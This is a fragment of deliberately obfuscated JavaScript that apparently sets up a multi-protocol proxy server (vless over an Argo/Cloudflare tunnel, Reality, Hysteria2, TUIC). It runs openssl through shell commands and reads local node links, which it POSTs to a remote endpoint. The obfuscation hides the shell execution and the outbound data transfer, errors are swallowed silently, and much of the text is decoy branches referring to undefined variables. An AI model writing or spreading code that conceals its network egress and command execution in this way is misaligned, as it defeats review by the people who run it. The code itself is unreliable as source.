_0x1baa63=_0x29cc47(_0x5234fd._0x29fe22,-_0x5234fd._0xae221b,_0x5234fd._0x303106,-_0x5234fd._0x559752);fs['writeFileSync'](path[_0x29cc47(-_0x5234fd._0x2013ff,_0x5234fd._0x4d7c51,_0x5234fd._0x9a1b62,-_0x5234fd._0x40da11)](FILE_PATH,_0xa9d7da['wyHnj']),_0x1baa63);const _0x23c7b9=_0x29cc47(-_0x5234fd._0x281371,-_0x5234fd._0x419ad2,-_0x5234fd._0x1c5d9b,-_0x5234fd._0x17e0e1);fs[_0x3852e1(_0x5234fd._0x27c599,_0x5234fd._0x33cb92,0x588,_0x5234fd._0x19ba4a)](path[_0x3852e1(0x59c,0x515,_0x5234fd._0x517b3b,_0x5234fd._0x45b8dd)](FILE_PATH,_0xa9d7da[_0x29cc47(-_0x5234fd._0x521b4d,-0x88,_0x5234fd._0x59fefd,-_0x5234fd._0x1645e1)]),_0x23c7b9);}}else{try{_0xa9d7da[_0x29cc47(-_0x5234fd._0x544a63,-_0x5234fd._0x1dea6c,-_0x5234fd._0x34a240,-0x76)](_0xa9d7da[_0x3852e1(_0x5234fd._0x25035c,_0x5234fd._0x2ea179,_0x5234fd._0x3724f1,0x4ed)],_0xa9d7da['LcZwB'])?await _0xa9d7da[_0x29cc47(-_0x5234fd._0xc820b,-_0x5234fd._0x44cfcc,-_0x5234fd._0x8c992d,-_0x5234fd._0x523a43)](execPromise,_0x29cc47(-_0x5234fd._0x48bf23,_0x5234fd._0x2c733c,-0x55,_0x5234fd._0x16a36c)+path[_0x3852e1(_0x5234fd._0xe01ff9,_0x5234fd._0x1cf9ac,_0x5234fd._0x4a5bbb,_0x5234fd._0x29c7b7)](FILE_PATH,_0x29cc47(_0x5234fd._0xd0ec44,_0x5234fd._0x4341d7,-_0x5234fd._0x139cb4,-_0x5234fd._0x139cb4))+'\x22'):_0x677646[_0x3852e1(0x28e,_0x5234fd._0x3f8d8e,_0x5234fd._0x388b30,_0x5234fd._0x206bc3)](_0x2883f7,_0x113916);}catch(_0x301929){console['error'](_0x29cc47(_0x5234fd._0x369bab,_0x5234fd._0x303dd2,_0x5234fd._0xd1fbe5,-_0x5234fd._0x263790)+_0x301929[_0x29cc47(-_0x5234fd._0x3552b3,-_0x5234fd._0xe0570b,-_0x5234fd._0x34459e,-0x1d7)]);return;}try{if(_0xa9d7da[_0x29cc47(0x4e,_0x5234fd._0x17bc27,_0x5234fd._0x2e8094,_0x5234fd._0x317a59)]===_0x3852e1(_0x5234fd._0x34c39c,0x1c3,_0x5234fd._0x39f87f,0x32b))await _0xa9d7da[_0x29cc47(-_0x5234fd._0x54b63a,-0x10d,_0x5234fd._0x3fdeb4,-_0x5234fd._0x40da39)](execPromise,'openssl\x20req\x20-new\x20-x509\x20-days\x203650\x20-key\x20\x22'+path[_0x3852e1(_0x5234fd._0x4b2364,0x5b2,_0x5234fd._0x277d6d,_0x5234fd._0x15908a)](FILE_PATH,_0xa9d7da[_0x29cc47(-_0x5234fd._0x20c6e8,-0x7b,-_0x5234fd._0x21430c,_0x5234fd._0xdadda6)])+_0x3852e1(_0x5234fd._0x2dd4ff,_0x5234fd._0x128362,_0x5234fd._0x4e959b,_0x5234fd._0x20af6b)+path[_0x3852e1(0x4b5,0x608,_0x5234fd._0x535b0e,_0x5234fd._0x408a29)](FILE_PATH,_0xa9d7da[_0x3852e1(_0x5234fd._0x30aa76,_0x5234fd._0x31c08c,_0x5234fd._0x3fe7b6,_0x5234fd._0x1aa1b0)])+_0x3852e1(_0x5234fd._0x5c0b57,_0x5234fd._0x3f5597,0x461,_0x5234fd._0x4a4ad4));else{if(!_0x24eba0)return;const _0x27a8d9=_0x2f67ba[_0x3852e1(_0x5234fd._0x164d87,_0x5234fd._0x4aa8d5,_0x5234fd._0x380efc,0x4d3)](_0x255d4e,_0x677646[_0x29cc47(-_0x5234fd._0x13e89b,-_0x5234fd._0x555719,-_0x5234fd._0x3a5e81,-_0x5234fd._0x10cabc)]);if(!_0x18d5c5[_0x3852e1(_0x5234fd._0x2fc803,_0x5234fd._0x4d85de,_0x5234fd._0x2395f1,_0x5234fd._0x4796b6)](_0x27a8d9))return;let _0x4b43db;try{_0x4b43db=_0xa52261['readFileSync'](_0x27a8d9,_0x677646[_0x29cc47(_0x5234fd._0x4dde38,_0x5234fd._0x4e55ae,_0x5234fd._0x44b600,0xd1)]);}catch{return null;}const _0x2b0531=_0x48fedf[_0x29cc47(-_0x5234fd._0x51b5a0,-0x18e,-_0x5234fd._0x38ca17,-_0x5234fd._0x1239f1)](_0x4b43db,_0x29cc47(_0x5234fd._0x137104,-_0x5234fd._0x409533,0xb6,-_0x5234fd._0x3c2ef4))[_0x3852e1(0x448,0x32d,_0x5234fd._0x9d630b,_0x5234fd._0x1bab78)](_0x677646[_0x29cc47(-0x6a,_0x5234fd._0x13f3ba,0x157,_0x5234fd._0x188f69)]),_0x438c8a=_0x2b0531[_0x3852e1(_0x5234fd._0x458242,_0x5234fd._0x9833b0,_0x5234fd._0x438085,_0x5234fd._0x277378)]('\x0a')[_0x3852e1(0x3e9,0x332,_0x5234fd._0x2362a7,0x2de)](_0x3352d2=>/(vless|vmess|trojan|hysteria2|tuic):\/\//['test'](_0x3352d2));if(_0x677646[_0x3852e1(_0x5234fd._0x1f8f21,0x43e,0x4b5,_0x5234fd._0x5b08af)](_0x438c8a[_0x3852e1(_0x5234fd._0x123f47,_0x5234fd._0x2d8eb9,_0x5234fd._0x4e959b,_0x5234fd._0x4cd448)],0x1486+-0x4*0x8e4+0xf0a))return;const _0x28eb40={};_0x28eb40['nodes']=_0x438c8a;const _0x33ce6a={};_0x33ce6a[_0x29cc47(-_0x5234fd._0x2d36bc,-_0x5234fd._0x28d065,-_0x5234fd._0x17a70f,-0x1a8)]='application/json';const _0x4c7072={};return _0x4c7072[_0x3852e1(_0x5234fd._0x14a6dc,_0x5234fd._0x380f3c,0x50c,0x3ce)]=_0x33ce6a,_0x226ade['post'](_0x61325b+_0x3852e1(_0x5234fd._0x59a517,_0x5234fd._0x490da5,_0x5234fd._0x24b423,0x463),_0x203f99['stringify'](_0x28eb40),_0x4c7072)['catch'](_0x8b1fb6=>{return null;});}}catch(_0x5195d9){console['error'](_0x3852e1(_0x5234fd._0x4f5a42,_0x5234fd._0x5805c7,_0x5234fd._0x26d19a,_0x5234fd._0x9be88f)+_0x5195d9['message']);return;}}if(!privateKey||!publicKey){console[_0x3852e1(_0x5234fd._0x284532,_0x5234fd._0x4c368c,0x3f7,_0x5234fd._0x4f39b6)](_0xa9d7da[_0x3852e1(_0x5234fd._0x5bb38e,_0x5234fd._0x3e98fe,_0x5234fd._0x6e793f,0x4f9)]);return;}const _0x37df4e={};_0x37df4e[_0x29cc47(-0x26a,-0x161,-_0x5234fd._0x1dea6c,-0x10a)]=!![],_0x37df4e['level']=_0xa9d7da[_0x3852e1(_0x5234fd._0x20af6b,_0x5234fd._0x562aa9,0x1f8,_0x5234fd._0x3450bf)],_0x37df4e[_0x3852e1(_0x5234fd._0x3724f1,0x57d,0x548,_0x5234fd._0x4c5ed8)]=!![];const _0x5e5032={};_0x5e5032[_0x3852e1(_0x5234fd._0x5f0c05,0x2c4,_0x5234fd._0x356469,_0x5234fd._0x1bc53d)]=_0xa9d7da[_0x3852e1(_0x5234fd._0x155df4,_0x5234fd._0x5c119d,_0x5234fd._0x238737,_0x5234fd._0x40704d)],_0x5e5032[_0x29cc47(_0x5234fd._0x1a9e21,_0x5234fd._0x253c13,_0x5234fd._0xbd1905,_0x5234fd._0x52bcb0)]=_0xa9d7da[_0x3852e1(0x371,0x269,0x344,_0x5234fd._0x30078e)];const _0x5c5dbc={};_0x5c5dbc['tag']=_0xa9d7da[_0x29cc47(0x3d,-_0x5234fd._0x41f830,-_0x5234fd._0x57dd71,-_0x5234fd._0x3c4b76)],_0x5c5dbc[_0x29cc47(-_0x5234fd._0x394d6f,-_0x5234fd._0x145b96,0x5e,-_0x5234fd._0xd5fd24)]=_0xa9d7da[_0x3852e1(0x40c,_0x5234fd._0x45938f,0x406,_0x5234fd._0xa5590d)];const _0x566b86={};_0x566b86['servers']=[_0x5e5032,_0x5c5dbc];const _0x45a407={};_0x45a407[_0x3852e1(_0x5234fd._0x1504fc,0x2c4,_0x5234fd._0x27560f,_0x5234fd._0x461ece)]=UUID;const _0xcb7c77={};_0xcb7c77[_0x3852e1(_0x5234fd._0x3cf3bb,_0x5234fd._0xeb641c,_0x5234fd._0x57924c,0x2f8)]=_0xa9d7da['gznAI'],_0xcb7c77[_0x3852e1(_0x5234fd._0xdcc6d7,_0x5234fd._0x401b12,_0x5234fd._0xc0f052,_0x5234fd._0x27038c)]=_0x3852e1(0x424,_0x5234fd._0x41d921,_0x5234fd._0x3fcf61,_0x5234fd._0x239a81),_0xcb7c77['listen']='::',_0xcb7c77[_0x29cc47(-_0x5234fd._0x263663,-_0x5234fd._0x2d36bc,-0x20d,-_0x5234fd._0x393e99)]=ARGO_PORT,_0xcb7c77[_0x29cc47(-_0x5234fd._0x36c3c0,-_0x5234fd._0x37f61e,0xd2,-0x132)]=[_0x45a407],_0xcb7c77[_0x3852e1(_0x5234fd._0xad1890,_0x5234fd._0x9c33cc,_0x5234fd._0x1e46dd,_0x5234fd._0x185614)]={},_0xcb7c77[_0x3852e1(_0x5234fd._0xad1890,_0x5234fd._0x9c33cc,_0x5234fd._0x1e46dd,_0x5234fd._0x185614)][_0x29cc47(_0x5234fd._0x503fff,_0x5234fd._0xbe31b2,_0x5234fd._0x283f36,_0x5234fd._0x3676cd)]='ws',_0xcb7c77[_0x3852e1(_0x5234fd._0xad1890,_0x5234fd._0x9c33cc,_0x5234fd._0x1e46dd,_0x5234fd._0x185614)][_0x29cc47(-_0x5234fd._0x199fd6,-0xf7,-0x16d,-_0x5234fd._0x4aca38)]=_0xa9d7da['fuzTm'],_0xcb7c77[_0x3852e1(_0x5234fd._0xad1890,_0x5234fd._0x9c33cc,_0x5234fd._0x1e46dd,_0x5234fd._0x185614)][_0x29cc47(-_0x5234fd._0x25f675,-_0x5234fd._0x21296a,-_0x5234fd._0x253c13,-0x29c)]=_0xa9d7da[_0x29cc47(_0x5234fd._0x2b4135,-_0x5234fd._0x1485d1,_0x5234fd._0x125c25,-_0x5234fd._0x6772a5)];const _0x1be43b={};_0x1be43b['type']=_0xa9d7da[_0x29cc47(-_0x5234fd._0x2285ab,-_0x5234fd._0x290aac,-_0x5234fd._0x4894ff,-_0x5234fd._0x2483df)],_0x1be43b[_0x29cc47(-_0x5234fd._0x3e76ce,-_0x5234fd._0x563f60,-0xcd,-_0x5234fd._0x53b92f)]=_0xa9d7da[_0x3852e1(_0x5234fd._0x5c86d9,0x54b,0x3ee,0x3fe)];const _0x270e8b={};_0x270e8b[_0x3852e1(_0x5234fd._0xdf9cca,0x53c,_0x5234fd._0x13de75,_0x5234fd._0x27038c)]=_0xa9d7da[_0x29cc47(-_0x5234fd._0x536955,_0x5234fd._0x209b0d,0x3e,_0x5234fd._0x580080)],_0x270e8b[_0x3852e1(0x255,_0x5234fd._0x526209,_0x5234fd._0x281277,0x2f8)]=_0x29cc47(-0x1ae,-_0x5234fd._0x9feebe,-0x29b,-0x1b4);const _0x1920eb={};_0x1920eb[_0x3852e1(0x52b,_0x5234fd._0x46b7a5,_0x5234fd._0x32a03a,_0x5234fd._0x34fdb6)]=_0xa9d7da[_0x3852e1(_0x5234fd._0x7a2b39,_0x5234fd._0x172135,0x475,_0x5234fd._0x2c76e2)],_0x1920eb[_0x3852e1(_0x5234fd._0xf1da14,0x3a6,_0x5234fd._0x103608,_0x5234fd._0x4f9259)]=_0x29cc47(_0x5234fd._0x49b243,_0x5234fd._0x5aaf17,-0x81,-_0x5234fd._0x6e1b2c),_0x1920eb[_0x3852e1(0x447,0x20b,0x278,_0x5234fd._0x318ab5)]=_0x29cc47(0x213,_0x5234fd._0xa9df3d,_0x5234fd._0x41e54a,_0x5234fd._0x3ef94e),_0x1920eb[_0x29cc47(-_0x5234fd._0xf53d11,-0x17,_0x5234fd._0x2f3326,-_0x5234fd._0x5a7516)]=0x968,_0x1920eb[_0x29cc47(_0x5234fd._0x7de96a,_0x5234fd._0x45c71a,_0x5234fd._0x48a9e1,_0x5234fd._0x4c9f48)]=[_0xa9d7da['yyvaM'],_0xa9d7da[_0x29cc47(-_0x5234fd._0x156d38,-_0x5234fd._0x59fefd,-0x40,0x2c)]],_0x1920eb[_0x29cc47(-_0x5234fd._0x41d1c1,-0x16f,-_0x5234fd._0x1892eb,-_0x5234fd._0x355839)]=_0xa9d7da[_0x3852e1(_0x5234fd._0x1a840c,0x261,_0x5234fd._0x401b12,_0x5234fd._0x33373d)],_0x1920eb[_0x29cc47(-_0x5234fd._0x3a8388,-_0x5234fd._0x49ae30,-_0x5234fd._0x29f964,-_0x5234fd._0x52660c)]=_0xa9d7da[_0x29cc47(0xa9,-_0x5234fd._0x4413ec,_0x5234fd._0x2c22a6,-_0x5234fd._0x391150)],_0x1920eb[_0x29cc47(-_0x5234fd._0xa9df3d,-0x130,_0x5234fd._0x544f73,-0x25b)]=[-0x10a*-0x23+0x45*-0x51+-0x4bd*0x3,-0xab*-0x25+-0x604+0x4d*-0x3d,0xc*0xcb+-0xe26+0x4d5],_0x1920eb[_0x29cc47(0x45,-0x25,-_0x5234fd._0xaf18f,-_0x5234fd._0x4587eb)]=0x58c;const _0x445288={};_0x445288[_0x29cc47(-_0x5234fd._0x3bbbdd,-_0x5234fd._0x944a32,-_0x5234fd._0x551278,-_0x5234fd._0x2fdde6)]=_0x3852e1(_0x5234fd._0x258bed,_0x5234fd._0xf06f79,_0x5234fd._0x4c7489,_0x5234fd._0x5c4d4b),_0x445288[_0x3852e1(_0x5234fd._0x1aa5b6,_0x5234fd._0x2d852e,0x61f,0x56a)]=_0xa9d7da['GKEYu'],_0x445288[_0x29cc47(-_0x5234fd._0x3bfc72,-_0x5234fd._0x23bba4,-_0x5234fd._0x3fba06,-_0x5234fd._0x3d0c25)]=_0xa9d7da[_0x3852e1(_0x5234fd._0x27785e,_0x5234fd._0x3650c1,_0x5234fd._0x380f3c,_0x5234fd._0x460168)],_0x445288[_0x3852e1(_0x5234fd._0x3badba,_0x5234fd._0x2e9b5d,_0x5234fd._0x1ea4e2,_0x5234fd._0x5d4d2d)]=_0xa9d7da[_0x3852e1(_0x5234fd._0x1cea61,_0x5234fd._0x1d9639,_0x5234fd._0x450a20,_0x5234fd._0x470683)],_0x445288[_0x29cc47(-_0x5234fd._0x152144,-_0x5234fd._0x8e7f79,_0x5234fd._0x53bb81,_0x5234fd._0xa9df3d)]=_0xa9d7da[_0x29cc47(-0x187,-_0x5234fd._0x3efb78,-0x4a,_0x5234fd._0xbe31b2)];const _0x1eb5bc={};_0x1eb5bc[_0x29cc47(-_0x5234fd._0x19116a,-_0x5234fd._0x563f60,-_0x5234fd._0x5d4bb6,-_0x5234fd._0x6a3fb5)]=_0xa9d7da['SfQkJ'],_0x1eb5bc['type']=_0xa9d7da[_0x29cc47(_0x5234fd._0x3095da,_0x5234fd._0x3de8dd,_0x5234fd._0x1c5798,0x195)],_0x1eb5bc[_0x3852e1(_0x5234fd._0x1fe463,_0x5234fd._0x5477b5,_0x5234fd._0x10cabc,_0x5234fd._0x58835f)]=_0xa9d7da[_0x3852e1(_0x5234fd._0x2adc3c,_0x5234fd._0x3d55ad,_0x5234fd._0xa132c1,_0x5234fd._0x3c4c23)],_0x1eb5bc[_0x29cc47(_0x5234fd._0x4acff3,-_0x5234fd._0x1c1928,-0x241,-_0x5234fd._0x3c0cb2)]=_0xa9d7da[_0x3852e1(_0x5234fd._0xcea6d9,0x3ad,_0x5234fd._0x13cf58,_0x5234fd._0x4f932b)],_0x1eb5bc[_0x3852e1(_0x5234fd._0xad1890,_0x5234fd._0xf06f79,_0x5234fd._0xfa94a0,_0x5234fd._0x6e2a26)]=_0xa9d7da[_0x29cc47(-_0x5234fd._0x1b728a,-_0x5234fd._0x3efb78,-0xcc,_0x5234fd._0x3847fb)];const _0x491992={};_0x491992['rule_set']=[_0x3852e1(_0x5234fd._0x40c4a4,_0x5234fd._0x433e72,_0x5234fd._0x56b0de,_0x5234fd._0x226859),_0xa9d7da[_0x3852e1(_0x5234fd._0x2f5f44,_0x5234fd._0x54c652,0x44e,_0x5234fd._0x38f556)]],_0x491992[_0x29cc47(-_0x5234fd._0x15aa06,-_0x5234fd._0x491430,-_0x5234fd._0x317a59,-_0x5234fd._0x232691)]=_0xa9d7da[_0x3852e1(0x332,0x2fc,_0x5234fd._0x2021b3,_0x5234fd._0x31ac0c)];const _0x376180={};_0x376180[_0x3852e1(_0x5234fd._0x30723b,_0x5234fd._0x5a81ea,_0x5234fd._0xdcc6d7,_0x5234fd._0xf7513b)]=[_0x445288,_0x1eb5bc],_0x376180[_0x3852e1(_0x5234fd._0x80a2e1,_0x5234fd._0xd2202e,0x65d,_0x5234fd._0x1c5669)]=[_0x491992],_0x376180[_0x29cc47(-_0x5234fd._0x46cb4e,-_0x5234fd._0x92b0d0,-0x14,-_0x5234fd._0x492e4d)]=_0xa9d7da[_0x29cc47(-0x138,-0x5c,-_0x5234fd._0x267844,_0x5234fd._0x145b96)];const _0x18ed61={};_0x18ed61['log']=_0x37df4e,_0x18ed61[_0x29cc47(_0x5234fd._0x59600d,-_0x5234fd._0xd1fbe5,-_0x5234fd._0xf53d11,_0x5234fd._0x2a1a7d)]=_0x566b86,_0x18ed61['inbounds']=[_0xcb7c77],_0x18ed61[_0x29cc47(-0xdd,-_0x5234fd._0x319c21,-_0x5234fd._0x4eaa87,-_0x5234fd._0x35c586)]=[_0x1be43b,_0x270e8b,_0x1920eb],_0x18ed61[_0x29cc47(-0x2d3,-_0x5234fd._0x4dee03,-_0x5234fd._0x38f49f,-_0x5234fd._0xbca85d)]=_0x376180;const _0xb03ba0=_0x18ed61;try{if(_0xa9d7da[_0x3852e1(0x2a9,_0x5234fd._0x212951,0x33e,_0x5234fd._0x3128b7)](_0xa9d7da[_0x3852e1(0x242,_0x5234fd._0x21333b,0x4c0,_0x5234fd._0x1965a)],_0xa9d7da[_0x3852e1(_0x5234fd._0x10cd29,_0x5234fd._0x8417c7,_0x5234fd._0x158bae,_0x5234fd._0x5b2f99)])){if(isValidPort(REALITY_PORT)){if(_0xa9d7da[_0x29cc47(_0x5234fd._0xd02f7d,-0xaa,_0x5234fd._0x3b1544,_0x5234fd._0x1a1982)]===_0xa9d7da[_0x3852e1(0x264,_0x5234fd._0x4180df,_0x5234fd._0x461125,_0x5234fd._0x2a1eca)])_0xb03ba0[_0x3852e1(_0x5234fd._0x10e4d9,0x245,0x3ee,_0x5234fd._0x409d3e)]['push']({'tag':_0xa9d7da[_0x3852e1(_0x5234fd._0x566846,_0x5234fd._0x393e99,_0x5234fd._0x42859e,_0x5234fd._0x20b0b3)],'type':_0xa9d7da[_0x3852e1(0x346,_0x5234fd._0x45f6f1,0x503,_0x5234fd._0x3926e6)],'listen':'::','listen_port':parseInt(REALITY_PORT),'users':[{'uuid':UUID,'flow':_0xa9d7da['tsQXL']}],'tls':{'enabled':!![],'server_name':_0xa9d7da[_0x29cc47(-_0x5234fd._0x2c0437,-_0x5234fd._0x1f767b,_0x5234fd._0x1a88e2,-_0x5234fd._0xf12fd4)],'reality':{'enabled':!![],'handshake':{'server':_0xa9d7da[_0x3852e1(_0x5234fd._0x122bfb,_0x5234fd._0x5efb81,_0x5234fd._0x57e767,_0x5234fd._0x38b15b)],'server_port':0x1bb},'private_key':privateKey,'short_id':['']}}});else{_0x270255['error'](_0x29cc47(-_0x5234fd._0x3456d1,-_0x5234fd._0x28b39f,-0x193,-_0x5234fd._0x53da86)+_0x85eeb['message']);return;}}}else{const _0x24cfb2={_0x1098f1:0x20c,_0x5e2e35:0x16b,_0x37c1c3:0x7b2,_0x21ea27:0x6d2,_0x1a1e66:0x118,_0x4fbe89:0x86,_0x4ad9bd:0x13a,_0x69b5a8:0x7,_0x339ff4:0x4b0,_0x509875:0x4d9,_0x189e4f:0x4f8,_0x53c718:0x119,_0x2ff3a2:0x62,_0x233e2f:0xbd,_0x25a447:0x1f,_0x3dc0da:0x139},_0xa95359={_0x3055f0:0x65a,_0x5cbd8e:0x11e,_0x457856:0x15b},_0x35b30e={_0x3cc06c:0x5f0,_0x513fd0:0x4f,_0x541104:0x1c6},_0x1ed053={_0x12da1c:0x4c0,_0x3132ab:0x186},_0x2897c3={_0x50bfc5:0x2af,_0xc955ac:0x191,_0x1d25de:0x201,_0x156f1c:0x175},_0x233510={'JFuCR':function(_0x662974,_0x19873c,_0xf033d6){const _0x5dfdc3={_0x10b2bb:0x8b,_0x2aab82:0x17,_0x5e5d5c:0x12a};function _0x3fb8b3(_0x55c9ad,_0x4c6d88,_0x15498b,_0xf2b92d){return _0x3852e1(_0x15498b,_0x4c6d88-_0x5dfdc3._0x10b2bb,_0x15498b-_0x5dfdc3._0x2aab82,_0xf2b92d- -_0x5dfdc3._0x5e5d5c);}return _0x677646[_0x3fb8b3(_0x2897c3._0x50bfc5,_0x2897c3._0xc955ac,_0x2897c3._0x1d25de,_0x2897c3._0x156f1c)](_0x662974,_0x19873c,_0xf033d6);}};_0x51b683[_0x3852e1(0x5a6,_0x5234fd._0x312637,_0x5234fd._0x3d92a5,_0x5234fd._0x15035f)][_0x29cc47(0x57,_0x5234fd._0x2470b2,_0x5234fd._0x4b8406,_0x5234fd._0x371789)](_0x57eb24),_0x5e3a2d['on'](_0x677646['rwpME'],()=>{function _0x50c501(_0x1e74bf,_0x52f0aa,_0x58b009,_0x4ee734){return _0x29cc47(_0x58b009,_0x52f0aa-_0x1ed053._0x12da1c,_0x58b009-0x1cf,_0x4ee734-_0x1ed053._0x3132ab);}_0x613585[_0x4a7062(_0x44ba24._0x20b65f,0x50b,_0x44ba24._0x180214,_0x44ba24._0x4a6f32)](),_0x3b8761[_0x4a7062(_0x44ba24._0x150675,_0x44ba24._0x581938,0x5e2,_0x44ba24._0x4eb1c2)](_0x4a7062(_0x44ba24._0x149d90,0x67d,_0x44ba24._0x166b55,_0x44ba24._0x22f437)+_0x20edcc+'\x20successfully');function _0x4a7062(_0x2f607b,_0x4fcfc8,_0x2823f6,_0x1299c8){return _0x29cc47(_0x1299c8,_0x2f607b-_0x35b30e._0x3cc06c,_0x2823f6-_0x35b30e._0x513fd0,_0x1299c8-_0x35b30e._0x541104);}_0x233510['JFuCR'](_0x5a71c5,null,_0x3bee1f);}),_0xde68f['on'](_0x677646[_0x29cc47(-_0x5234fd._0x44b600,-_0x5234fd._0x13c1d2,-_0x5234fd._0xed9ea7,-_0x5234fd._0x3d37e9)],_0x6e3b7a=>{const _0x5248a4={_0x26c9d5:0xd9,_0x3c60ca:0x6d};function _0x508598(_0x3efa88,_0x743b5f,_0x3ba9f0,_0x5ec039){return _0x29cc47(_0x3efa88,_0x743b5f-_0xa95359._0x3055f0,_0x3ba9f0-_0xa95359._0x5cbd8e,_0x5ec039-_0xa95359._0x457856);}function _0x565289(_0x542bff,_0xaf4ce4,_0x2730a9,_0x5cdaee){return _0x29cc47(_0xaf4ce4,_0x5cdaee-_0x5248a4._0x26c9d5,_0x2730a9-0x7d,_0x5cdaee-_0x5248a4._0x3c60ca);}_0x4a763a[_0x565289(0x25,_0x24cfb2._0x1098f1,0x2a5,_0x24cfb2._0x5e2e35)](_0x575bb4,()=>{});const _0x233f9f=_0x508598(_0x24cfb2._0x37c1c3,0x667,_0x24cfb2._0x21ea27,0x56f)+_0x2d974f+_0x565289(_0x24cfb2._0x1a1e66,-_0x24cfb2._0x4fbe89,_0x24cfb2._0x4ad9bd,_0x24cfb2._0x69b5a8)+_0x6e3b7a[_0x508598(_0x24cfb2._0x339ff4,_0x24cfb2._0x509875,_0x24cfb2._0x189e4f,0x4f0)];_0x44a0ea[_0x565289(-_0x24cfb2._0x53c718,-0x88,0x68,-_0x24cfb2._0x2ff3a2)](_0x233f9f),_0x677646[_0x565289(_0x24cfb2._0x233e2f,-_0x24cfb2._0x25a447,-_0x24cfb2._0x3dc0da,-0x1d)](_0x4ad139,_0x233f9f);});}}catch(_0x1d9f88){}try{if(_0xa9d7da[_0x29cc47(-_0x5234fd._0x11c887,-_0x5234fd._0x484244,0x40,-_0x5234fd._0x527442)](isValidPort,HY2_PORT)){if(_0xa9d7da[_0x3852e1(_0x5234fd._0x2418cc,0x4f2,_0x5234fd._0x2e3de2,_0x5234fd._0x2b369c)](_0xa9d7da[_0x3852e1(_0x5234fd._0x318e8c,0x38e,_0x5234fd._0x94b4fc,0x2da)],_0xa9d7da[_0x29cc47(-0x210,-_0x5234fd._0x9471f1,-_0x5234fd._0x2a80d7,-_0x5234fd._0x562aa9)])){const _0x4ee951={};_0x4ee951[_0x3852e1(_0x5234fd._0x4a6744,_0x5234fd._0x5e1a13,_0x5234fd._0x754110,0x372)]=UUID,_0xb03ba0[_0x29cc47(-_0x5234fd._0x52d824,-_0x5234fd._0x4e906a,-_0x5234fd._0x8cbf55,-0x2c9)][_0x3852e1(_0x5234fd._0xd4e75c,_0x5234fd._0x5d4309,_0x5234fd._0x50de78,_0x5234fd._0xe75191)]({'tag':_0xa9d7da[_0x3852e1(_0x5234fd._0x52d824,_0x5234fd._0x1ccc87,_0x5234fd._0x50fd10,0x368)],'type':_0xa9d7da[_0x3852e1(_0x5234fd._0x471651,_0x5234fd._0x2b3b94,_0x5234fd._0x5f56a6,_0x5234fd._0xc00c4e)],'listen':'::','listen_port':parseInt(HY2_PORT),'users':[_0x4ee951],'masquerade':_0x3852e1(0x3fb,_0x5234fd._0x1ea4e2,_0x5234fd._0x2c5825,_0x5234fd._0x13b9af),'tls':{'enabled':!![],'alpn':['h3'],'certificate_path':path[_0x3852e1(0x471,_0x5234fd._0xa90c1c,_0x5234fd._0x3cb57b,_0x5234fd._0x2f5cab)](FILE_PATH,_0xa9d7da['dVXYr']),'key_path':path['join'](FILE_PATH,_0xa9d7da['wyHnj'])}});}else{_0x1f6ba9[_0x3852e1(_0x5234fd._0x4f4aea,_0x5234fd._0x32a03a,0x3aa,_0x5234fd._0x21098f)](_0x1c5b96[_0x29cc47(_0x5234fd._0x305bc0,_0x5234fd._0x263790,0x19c,-_0x5234fd._0xd02f7d)],_0x17ea9e);return;}}}catch(_0x5bc904){}try{if(_0xa9d7da[_0x3852e1(0x66b,_0x5234fd._0x3684cf,_0x5234fd._0x175429,_0x5234fd._0x3f3009)](isValidPort,TUIC_PORT)){const _0x28ff42={};_0x28ff42[_0x29cc47(-_0x5234fd._0x552778,-_0x5234fd._0x4508f5,-0x193,-_0x5234fd._0x5d7d36)]=UUID,_0xb03ba0['inbounds'][_0x29cc47(-_0x5234fd._0x251782,_0x5234fd._0xf73752,0xe2,_0x5234fd._0x10132b)]({'tag':_0xa9d7da[_0x3852e1(0x411,0x1ce,0x306,_0x5234fd._0x5c1475)],'type':_0x29cc47(_0x5234fd._0x1f2132,-_0x5234fd._0x4412df,-0x28d,-_0x5234fd._0x52f83e),'listen':'::','listen_port':_0xa9d7da[_0x3852e1(_0x5234fd._0x557cca,0x341,_0x5234fd._0x43f000,_0x5234fd._0x1b25e9)](parseInt,TUIC_PORT),'users':[_0x28ff42],'congestion_control':_0xa9d7da[_0x29cc47(-_0x5234fd._0x145b96,-_0x5234fd._0x327ab6,-_0x5234fd._0x30dbc0,-0x8d)],'tls':{'enabled':!![],'alpn':['h3'],'certificate_path':path[_0x3852e1(_0x5234fd._0x3d21d9,_0x5234fd._0x21fab3,_0x5234fd._0x24a537,_0x5234fd._0x2f5cab)](FILE_PATH,_0x29cc47(_0x5234fd._0x3488d7,_0x5234fd._0x3fe2b0,-_0x5234fd._0x578c0f,_0x5234fd._0x3eee37)),'key_path':path[_0x3852e1(_0x5234fd._0x3ee815,_0x5234fd._0x3f90ba,_0x5234fd._0x475202,_0x5234fd._0x16c3a6)](FILE_PATH,_0xa9d7da['wyHnj'])}});}}catch(_0x123264){}try{if(_0xa9d7da['RdKhj'](_0xa9d7da[_0x3852e1(0x252,_0x5234fd._0x5a26be,_0x5234fd._0x1eaba1,_0x5234fd._0x56e7e7)],_0x29cc47(-_0x5234fd._0xe0570b,-_0x5234fd._0x37cf1a,-0x1c0,-_0x5234fd._0xb0712))){let _0x3baeb5=!![];if(_0xa9d7da[_0x3852e1(0x31e,_0x5234fd._0x4b0fc4,_0x5234fd._0xdb4707,_0x5234fd._0x463a3f)](YT_WARPOUT,!![])){if(_0xa9d7da['EsGGx']===_0x29cc47(-0x171,-0xbf,_0x5234fd._0x33384c,-_0x5234fd._0x3c1c9e)){const _0x3413e2=_0x5aa15e[_0x29cc47(-_0x5234fd._0x20ae7b,-_0x5234fd._0x395740,-_0x5234fd._0x47b784,-0xb4)](/https?:\/\/([^ ]*trycloudflare\.com)\/?/);if(_0x3413e2){const _0x5de4ff=_0x3413e2[0x8c*-0x27+0x1381+0x1d4*0x1];_0x34758d[_0x3852e1(_0x5234fd._0x2712fb,_0x5234fd._0x4e9fbb,0x4d7,_0x5234fd._0x3c7477)](_0x5de4ff);}}else _0x3baeb5=![];}else try{const 